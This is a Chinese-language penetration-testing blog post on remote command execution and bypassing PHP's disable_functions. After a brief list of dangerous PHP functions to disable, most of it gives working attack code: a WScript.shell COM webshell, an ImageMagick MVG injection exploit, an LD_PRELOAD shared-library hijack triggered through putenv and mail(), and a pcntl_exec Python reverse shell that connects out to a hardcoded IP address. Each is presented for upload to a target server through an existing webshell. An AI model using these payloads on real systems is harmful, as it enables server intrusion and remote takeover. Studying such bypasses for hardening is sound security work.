<!DOCTYPE html>
<html lang="zh">
<head>
  <meta charset="utf-8">
  <link rel="icon" href="">
  <title>RCE命令执行/代码执行 | wumingzhilian</title>
  <meta name="author" content="wuming" />
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="robots" content="index,follow" />
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <meta name="format-detection" content="telphone=no, email=no" />
  
    
      <meta name="description" itemprop="description" content="" />
    
    <meta property="og:title" content="RCE命令执行/代码执行" />
    
    <meta property="og:url" content="http://wumingzhilian.github.to/2020/08/19/RCE%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C-%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/" />
    
      <meta name="twitter:card" content="summary" />
      <meta name="twitter:site" content="@wumingzhilian" />
      <meta name="twitter:title" content="RCE命令执行/代码执行" />
      
        <meta name="twitter:description" content="" />
      
      
    
  
  <link rel="alternate" href="atom.xml" type="application/atom+xml">
  <!-- 样式表文件 -->
  <link rel="stylesheet" id="kratos-css" href="/css/kratosr.min.css" type="text/css" media="all">
  <link rel="stylesheet" id="highlight-css" href="/css/highlight.min.css" type="text/css" media="all">
  <link rel="stylesheet" id="fontawe-css" href="https://cdn.jsdelivr.net/npm/font-awesome@4.7.0/css/font-awesome.min.css" type="text/css" media="all">
  <link rel="stylesheet" id="nprogress-css" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" type="text/css" media="all">
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/disqusjs@1.2.6/dist/disqusjs.css">
  
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/aplayer@1.10.1/dist/APlayer.min.css">
  
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css">
  
  
    <link rel="stylesheet" id="darkmode-css" href="/css/kr-dark.min.css" type="text/css" media="all">
  
  <!-- 不得不预先加载的一些JS文件 -->
  <script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
  
    <script async src="https://cdn.jsdelivr.net/npm/qrcode_js@1.0.0/qrcode.min.js"></script>
  
  
    <script async src="https://cdn.jsdelivr.net/npm/disqusjs@1.2.6/dist/disqus.js"></script>
  
<meta name="generator" content="Hexo 5.0.0"></head>
<body class="custom-background">
    <div id="kratos-wrapper">
        <div id="kratos-page">
            <div id="kratos-header">
                <div class="nav-toggle"><a class="kratos-nav-toggle js-kratos-nav-toggle"><i></i></a></div>
                <header id="kratos-header-section">
                    <div class="container">
                        <div class="nav-header">
                            <div class="color-logo"><a href="/">wumingzhilian</a></div>
                            <nav id="kratos-menu-wrap">
                              <ul id="kratos-primary-menu" class="sf-menu">
                              
                                
                                  <li><a href="/"><i class="fa fa-home"></i>首页</a></li>
                                
                              
                                
                                  <li><a href="/archives/"><i class="fa fa-file"></i>档案馆</a></li>
                                
                              
                                
                                  <li><a href="/friends/"><i class="fa fa-mars-double"></i>好伙伴</a></li>
                                
                              
                                
                                  <li><a href="/about/"><li><i class="fa fa-paper-plane"></i>关于我</a></li>
                                
                              
                              </ul>
                            </nav>
                        </div>
                    </div>
                </header>
            </div>

<div class="kratos-start kratos-hero-2">
    <!-- <div class="kratos-overlay"></div> -->
    <div class="kratos-cover kratos-cover-2 text-center">
        <div class="desc desc2 animate-box">
            <a href="/"><h2>wumingzhilian</h2><br><span></span></a>
        </div>
    </div>
</div>

<div id="kratos-blog-post">
    <div class="container">
            <div class="row">
                
<div id="main">
    <section class="col-md-8">
    <article>
        <div class="kratos-hentry kratos-post-inner clearfix">
            <header class="kratos-entry-header">
                <h1 class="kratos-entry-title text-center">RCE命令执行/代码执行</h1>
                
                <div class="kratos-post-meta text-center">
                    <span>
                    <i class="fa fa-calendar"></i> 2020-08-19
                    <i class="fa fa-folder"></i> 分类于 <a class="label-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a>
                    <i class="fa fa-user"></i> 作者 wuming
                    </span>
                </div>
            </header>
            <div class="kratos-post-content">
                
                    <div class="kratos-post-inner-toc">
                        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#rce"><span class="toc-number">1.</span> <span class="toc-text">rce</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#disable-function"><span class="toc-number">1.1.</span> <span class="toc-text">disable_function</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BB%95%E8%BF%87disable-function"><span class="toc-number">1.2.</span> <span class="toc-text">绕过disable_function</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%80-%E7%B3%BB%E7%BB%9F%E7%BB%84%E4%BB%B6%E7%BB%95%E8%BF%87"><span class="toc-number">1.2.1.</span> <span class="toc-text">一.系统组件绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BA%8C-%E5%88%A9%E7%94%A8ImageMagick%E6%BC%8F%E6%B4%9E%E7%BB%95%E8%BF%87disable-function"><span class="toc-number">1.2.2.</span> <span class="toc-text">二.利用ImageMagick漏洞绕过disable_function</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%89-%E5%88%A9%E7%94%A8%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8FLD-PRELOAD%E6%9D%A5%E7%BB%95%E8%BF%87php-disable-function%E6%89%A7%E8%A1%8C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4"><span class="toc-number">1.2.3.</span> <span class="toc-text">三.利用环境变量LD_PRELOAD来绕过php disable_function执行系统命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%9B%9B-%E5%88%A9%E7%94%A8pcntl-exec%E7%AA%81%E7%A0%B4disable-functions"><span class="toc-number">1.2.4.</span> <span class="toc-text">四.利用pcntl_exec突破disable_functions</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#php7-%E7%9A%84%E7%BB%95%E8%BF%87"><span class="toc-number">1.2.5.</span> <span class="toc-text">php7 的绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8apache%E7%BB%95%E8%BF%87"><span class="toc-number">1.2.6.</span> <span class="toc-text">利用apache绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8windows-%E7%B3%BB%E7%BB%9F%E7%BB%84%E4%BB%B6com"><span class="toc-number">1.2.7.</span> <span class="toc-text">使用windows 系统组件com</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8%E9%81%97%E6%BC%8F%E5%87%BD%E6%95%B0"><span class="toc-number">1.2.8.</span> <span class="toc-text">使用遗漏函数</span></a></li></ol></li></ol></li></ol>
                    </div>
                
                <hr />
                <h1 id="rce"><a href="#rce" class="headerlink" title="rce"></a>rce</h1><p>RCE英文全称：remote command/code execute<br>分为远程命令执行ping和远程代码执行evel。<br>漏洞出现的原因：没有在输入口做输入处理。<br>我们常见的路由器、防火墙、入侵检测等设备的web管理界面上</p>
<h2 id="disable-function"><a href="#disable-function" class="headerlink" title="disable_function"></a>disable_function</h2><p>有些时候，我们必须要禁用一些函数，来保证安全</p>
<ul>
<li><p>phpinfo()<br>功能描述：输出 PHP 环境信息以及相关的模块、WEB 环境等信息。<br>危险等级：中</p>
</li>
<li><p>passthru()<br>功能描述：允许执行一个外部程序并回显输出，类似于 exec()。<br>危险等级：高</p>
</li>
<li><p>exec()<br>功能描述：允许执行一个外部程序（如 UNIX Shell 或 CMD 命令等）。<br>危险等级：高</p>
</li>
<li><p>system()<br>功能描述：允许执行一个外部程序并回显输出，类似于 passthru()。<br>危险等级：高</p>
</li>
<li><p>chroot() 功能描述：可改变当前 PHP 进程的工作根目录，仅当系统支持 CLI 模式 PHP 时才能工作，且该函数不适用于<br>Windows 系统。 危险等级：高</p>
</li>
<li><p>scandir() 功能描述：列出指定路径中的文件和目录。 危险等级：中</p>
</li>
<li><p>chgrp() 功能描述：改变文件或目录所属的用户组。 危险等级：高</p>
</li>
<li><p>chown() 功能描述：改变文件或目录的所有者。 危险等级：高</p>
</li>
<li><p>shell_exec() 功能描述：通过 Shell 执行命令，并将执行结果作为字符串返回。 危险等级：高</p>
</li>
<li><p>proc_open() 功能描述：执行一个命令并打开文件指针用于读取以及写入。 危险等级：高</p>
</li>
<li><p>proc_get_status() 功能描述：获取使用 proc_open() 所打开进程的信息。 危险等级：高</p>
</li>
<li><p>error_log() 功能描述：将错误信息发送到指定位置（文件）。 安全备注：在某些版本的 PHP 中，可使用 error_log()<br>绕过 PHP safe</p>
</li>
<li><p>mode， 执行任意命令。 危险等级：低</p>
</li>
<li><p>ini_alter() 功能描述：是 ini_set() 函数的一个别名函数，功能与 ini_set() 相同。 具体参见<br>ini_set()。 危险等级：高</p>
</li>
<li><p>ini_set()<br>功能描述：可用于修改、设置 PHP 环境配置参数。<br>危险等级：高</p>
</li>
<li><p>ini_restore()<br>功能描述：可用于恢复 PHP 环境配置参数到其初始值。<br>危险等级：高</p>
</li>
<li><p>dl() 功能描述：在 PHP 进行运行过程当中（而非启动时）加载一个 PHP 外部模块。 危险等级：高</p>
</li>
<li><p>pfsockopen() 功能描述：建立一个 Internet 或 UNIX 域的 socket 持久连接。 危险等级：高</p>
</li>
<li><p>syslog() 功能描述：可调用 UNIX 系统的系统层 syslog() 函数。 危险等级：中</p>
</li>
<li><p>readlink() 功能描述：返回符号连接指向的目标文件内容。 危险等级：中</p>
</li>
<li><p>symlink() 功能描述：在 UNIX 系统中建立一个符号链接。 危险等级：高</p>
</li>
<li><p>popen() 功能描述：可通过 popen() 的参数传递一条命令，并对 popen() 所打开的文件进行执行。 危险等级：高</p>
</li>
<li><p>stream_socket_server() 功能描述：建立一个 Internet 或 UNIX 服务器连接。 危险等级：中</p>
</li>
<li><p>putenv() 功能描述：用于在 PHP 运行时改变系统字符集环境。在低于 5.2.6 版本的 PHP 中，可利用该函数<br>修改系统字符集环境后，利用 sendmail 指令发送特殊参数执行系统 SHELL 命令。 危险等级：高</p>
</li>
</ul>
<ul>
<li>禁用方法如下： 打开/etc/php.ini文件， 查找到 disable_functions ，添加需禁用的函数名，如下：<br><code>phpinfo,eval,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket,fsockopen</code></li>
</ul>
<h2 id="绕过disable-function"><a href="#绕过disable-function" class="headerlink" title="绕过disable_function"></a>绕过disable_function</h2><h3 id="一-系统组件绕过"><a href="#一-系统组件绕过" class="headerlink" title="一.系统组件绕过"></a>一.系统组件绕过</h3><p>window com组件(php 5.4)(高版本扩展要自己添加）<br>条件：要在php.ini中开启（如图）</p>
<p><img src="https://img-blog.csdnimg.cn/20200814104228584.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2h4aHhoeGh4eA==,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p>
<p>利用代码，利用shell上传如下代码到目标服务器上</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$command=$_GET[<span class="string">&#x27;a&#x27;</span>];</span><br><span class="line">$wsh = <span class="keyword">new</span> COM(<span class="string">&#x27;WScript.shell&#x27;</span>); <span class="comment">// 生成一个COM对象　Shell.Application也能</span></span><br><span class="line">$exec = $wsh-&gt;exec(<span class="string">&quot;cmd /c &quot;</span>.$command); <span class="comment">//调用对象方法来执行命令</span></span><br><span class="line">$stdout = $exec-&gt;StdOut();</span><br><span class="line">$stroutput = $stdout-&gt;ReadAll();</span><br><span class="line"><span class="keyword">echo</span> $stroutput;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>利用成功后的结果</p>
<p><img src="https://img-blog.csdnimg.cn/20200814104501788.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2h4aHhoeGh4eA==,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br><code>彻底的解决方案是 直接删除System32目录下wshom.ocx文件</code></p>
<h3 id="二-利用ImageMagick漏洞绕过disable-function"><a href="#二-利用ImageMagick漏洞绕过disable-function" class="headerlink" title="二.利用ImageMagick漏洞绕过disable_function"></a>二.利用ImageMagick漏洞绕过disable_function</h3><p>ImageMagick是一套功能强大、稳定而且开源的工具集和开发包，可以用来读、写和处理超过89种基本格式的图片文件，如果phpinfo中看到有这个，可以尝试如下利用</p>
<p><img src="https://img-blog.csdnimg.cn/20200814104647169.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2h4aHhoeGh4eA==,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p>
<p>利用代码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;Disable Functions: &quot;</span> . ini_get(<span class="string">&#x27;disable_functions&#x27;</span>) . <span class="string">&quot;\n&quot;</span>;</span><br><span class="line"></span><br><span class="line">$command = PHP_SAPI == <span class="string">&#x27;cli&#x27;</span> ? $argv[<span class="number">1</span>] : $_GET[<span class="string">&#x27;cmd&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span> ($command == <span class="string">&#x27;&#x27;</span>) &#123;</span><br><span class="line">    $command = <span class="string">&#x27;id&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$exploit = <span class="string">&lt;&lt;&lt;EOF</span></span><br><span class="line"><span class="string">push graphic-context</span></span><br><span class="line"><span class="string">viewbox 0 0 640 480</span></span><br><span class="line"><span class="string">fill &#x27;url(https://example.com/image.jpg&quot;|<span class="subst">$command</span>&quot;)&#x27;</span></span><br><span class="line"><span class="string">pop graphic-context</span></span><br><span class="line"><span class="string">EOF;</span></span><br><span class="line"></span><br><span class="line">file_put_contents(<span class="string">&quot;KKKK.mvg&quot;</span>, $exploit);</span><br><span class="line">$thumb = <span class="keyword">new</span> Imagick();</span><br><span class="line">$thumb-&gt;readImage(<span class="string">&#x27;KKKK.mvg&#x27;</span>);</span><br><span class="line">$thumb-&gt;writeImage(<span class="string">&#x27;KKKK.png&#x27;</span>);</span><br><span class="line">$thumb-&gt;clear();</span><br><span class="line">$thumb-&gt;destroy();</span><br><span class="line">unlink(<span class="string">&quot;KKKK.mvg&quot;</span>);</span><br><span class="line">unlink(<span class="string">&quot;KKKK.png&quot;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h3 id="三-利用环境变量LD-PRELOAD来绕过php-disable-function执行系统命令"><a href="#三-利用环境变量LD-PRELOAD来绕过php-disable-function执行系统命令" class="headerlink" title="三.利用环境变量LD_PRELOAD来绕过php disable_function执行系统命令"></a>三.利用环境变量LD_PRELOAD来绕过php disable_function执行系统命令</h3><p>php的mail函数在执行过程中会默认调用系统程序/usr/sbin/sendmail，如果我们能劫持sendmail程序，再用mail函数来触发就能实现我们的目的</p>
<p><strong>利用原理</strong><br>LD_PRELOAD是Linux系统的下一个有趣的环境变量：“它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量，我们可以在主程序和其动态链接库的中间加载别的动态链接库，甚至覆盖正常的函数库。一方面，我们可以以此功能来使用自己的或是更好的函数（无需别人的源码），而另一方面，我们也可以以向别人的程序注入程序，从而达到特定的目的。</p>
<p>可能这个不好理解，我们做一个简单的测试代码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span> **argv)</span></span>&#123;</span><br><span class="line"><span class="keyword">char</span> passwd[] = <span class="string">&quot;password&quot;</span>;</span><br><span class="line"><span class="keyword">if</span> (argc &lt; <span class="number">2</span>) &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;usage: %s &lt;password&gt;/n&quot;</span>, argv[<span class="number">0</span>]);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> (!<span class="built_in">strcmp</span>(passwd, argv[<span class="number">1</span>])) &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;Correct Password!/n&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;Invalid Password!/n&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"># 保存为a.c，并编译为a</span><br></pre></td></tr></table></figure>
<p>保存如上代码为a.c，并编译为a,编译命令如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gcc a.c -o a</span><br></pre></td></tr></table></figure>

<p>运行a结果如下</p>
<p><img src="https://img-blog.csdnimg.cn/20200814105437734.png#pic_center" alt="在这里插入图片描述"></p>
<p>以上程序很简单，根据判断传入的字符串是否等于”password”，得出两种不同结果。 其中用到了标准C函数strcmp函数来做比较，这是一个外部调用函数，我们来重新编写一个同名函数,代码如下(保存如下代码为b.c)</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">strcmp</span><span class="params">(<span class="keyword">const</span> <span class="keyword">char</span> *s1, <span class="keyword">const</span> <span class="keyword">char</span> *s2)</span></span>&#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;hack functio  n invoked. s1=&lt;%s&gt; s2=&lt;%s&gt;/n&quot;</span>, s1, s2);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>我们编译以上代码为一个动态共享库，编译命令如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gcc -fPIC -shared b.c -o b.so</span><br></pre></td></tr></table></figure>

<p>通过LD_PRELOAD来设置它能被其他调用它的程序优先加载</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">export</span> LD_PRELOAD=<span class="string">&quot;./b.so&quot;</span></span><br></pre></td></tr></table></figure>

<p>我们再次运行a<br>./a bbb<br>Correct Password!<br><img src="https://img-blog.csdnimg.cn/20200814105525546.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2h4aHhoeGh4eA==,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p>
<p>我们看到随意输入字符串都会显示密码正确，这说明程序在运行时优先加载了我们自己编写的程序。这也就是说如果程序在运行过程中调用了某个标准的动态链接库的函数，那么我们就有机会通过LD_PRELOAD来设置它优先加载我们自己编写的程序，实现劫持。</p>
<p>结合mail 函数进行实战测试<br>那么我们来看一下sendmail函数都调用了哪些库函数，使用readelf -Ws /usr/sbin/sendmail命令来查看，我们发现sendmail函数在运行过程动态调用了很多标准库函数：<br>!](<a target="_blank" rel="noopener" href="https://img-blog.csdnimg.cn/2020081410553425.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2h4aHhoeGh4eA==,size_16,color_FFFFFF,t_70#pic_center">https://img-blog.csdnimg.cn/2020081410553425.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2h4aHhoeGh4eA==,size_16,color_FFFFFF,t_70#pic_center</a>)</p>
<p><strong>构造poc思路</strong><br>编制我们自己的动态链接程序。 通过php的putenv来设置LD_PRELOAD，让我们的程序优先被调用。 在webshell上用mail函数发送一封邮件来触发。具体实现如下</p>
<p>1.编制我们自己的动态链接程序，代码如下（功能是执行mkdir test）<br>执行编译为一个动态共享库的命令如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">gcc -c -fPIC a.c -o a</span><br><span class="line">gcc -shared a -o a.so</span><br></pre></td></tr></table></figure>

<p>代码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">payload</span><span class="params">()</span></span>&#123;</span><br><span class="line">         FILE*fp = fopen(<span class="string">&quot;/tmp/2.txt&quot;</span>,<span class="string">&quot;w&quot;</span>);</span><br><span class="line">         fclose(fp);</span><br><span class="line">         system(<span class="string">&quot;mkdir /var/www/html/test&quot;</span>);</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">geteuid</span><span class="params">()</span></span>&#123;</span><br><span class="line">  FILE *fp1=fopen(<span class="string">&quot;/tmp/2.txt&quot;</span>,<span class="string">&quot;r&quot;</span>);</span><br><span class="line">  <span class="keyword">if</span>(fp1!=<span class="literal">NULL</span>)</span><br><span class="line">  &#123;</span><br><span class="line">   fclose(fp1);</span><br><span class="line">         <span class="keyword">return</span> <span class="number">552</span>;</span><br><span class="line">        &#125;<span class="keyword">else</span> &#123;</span><br><span class="line">         payload();</span><br><span class="line">         <span class="keyword">return</span> <span class="number">552</span>;</span><br><span class="line">       &#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>2.利用webshell，上传编译后的a.so到目标服务器<br>3.通过putenv来设置LD_PRELOAD，让我们的程序优先被调用。在webshell上用mail函数发送一封邮件来触发。利用代码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">   putenv(<span class="string">&quot;LD_PRELOAD=/var/www/html/a.so&quot;</span>);</span><br><span class="line">   mail(<span class="string">&quot;[email protected]&quot;</span>,<span class="string">&quot;&quot;</span>,<span class="string">&quot;&quot;</span>,<span class="string">&quot;&quot;</span>,<span class="string">&quot;&quot;</span>);</span><br><span class="line">  <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>结果如下，成功执行命令，创建文件test<br><img src="https://img-blog.csdnimg.cn/20200814105710304.png#pic_center" alt="在这里插入图片描述"></p>
<h3 id="四-利用pcntl-exec突破disable-functions"><a href="#四-利用pcntl-exec突破disable-functions" class="headerlink" title="四.利用pcntl_exec突破disable_functions"></a>四.利用pcntl_exec突破disable_functions</h3><p>pcntl是linux下的一个扩展，可以支持php的多线程操作。(与python结合反弹shell) pcntl_exec函数的作用是在当前进程空间执行指定程序，版本要求：PHP 4 &gt;= 4.2.0, PHP 5</p>
<p>利用代码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span>  pcntl_exec(<span class="string">&quot;/usr/bin/python&quot;</span>,<span class="keyword">array</span>(<span class="string">&#x27;-c&#x27;</span>, <span class="string">&#x27;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM,socket.SOL_TCP);s.connect((&quot;132.232.75.90&quot;,9898));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/bash&quot;,&quot;-i&quot;]);&#x27;</span>));<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20200814105730561.png#pic_center" alt="在这里插入图片描述"></p>
<p><img src="https://img-blog.csdnimg.cn/20200814105738704.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2h4aHhoeGh4eA==,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p>
<h3 id="php7-的绕过"><a href="#php7-的绕过" class="headerlink" title="php7 的绕过"></a>php7 的绕过</h3><p><a target="_blank" rel="noopener" href="https://github.com/mm0r1/exploits/tree/master/php7-backtrace-bypass">https://github.com/mm0r1/exploits/tree/master/php7-backtrace-bypass</a></p>
<p>一把梭<br><img src="https://img-blog.csdnimg.cn/20200814105849155.png#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20200814105858582.png#pic_center" alt="在这里插入图片描述"></p>
<p>(1) 首先查看phpinfo ,如果是php 7 ，直接先上面工具一把梭<br>(2) 如果不是php7 ,那么再看disable_function 有没有遗漏的函数，毕竟是黑名单，所以很有可能没写全，可以对照这个列表来比较:<br><code>dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,putenv,ini_set,apache_setenv,symlink,link </code></p>
<h3 id="利用apache绕过"><a href="#利用apache绕过" class="headerlink" title="利用apache绕过"></a>利用apache绕过</h3><p>利用apache ，cgi mod 和 .htaccess 来绕过 <a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/218495.html">https://www.freebuf.com/vuls/218495.html</a><br>（1）利用条件:<br>phpinfo 中搜索server api 是 cgi 或者fastcgi<br>（2）如果是cgi 模式:<br><img src="https://img-blog.csdnimg.cn/20200814110245479.png#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20200814110256398.png#pic_center" alt="在这里插入图片描述"><br>（3）如果是fast_cgi 模式:<img src="https://img-blog.csdnimg.cn/20200814110319260.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2h4aHhoeGh4eA==,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20200814110344456.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2h4aHhoeGh4eA==,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p>
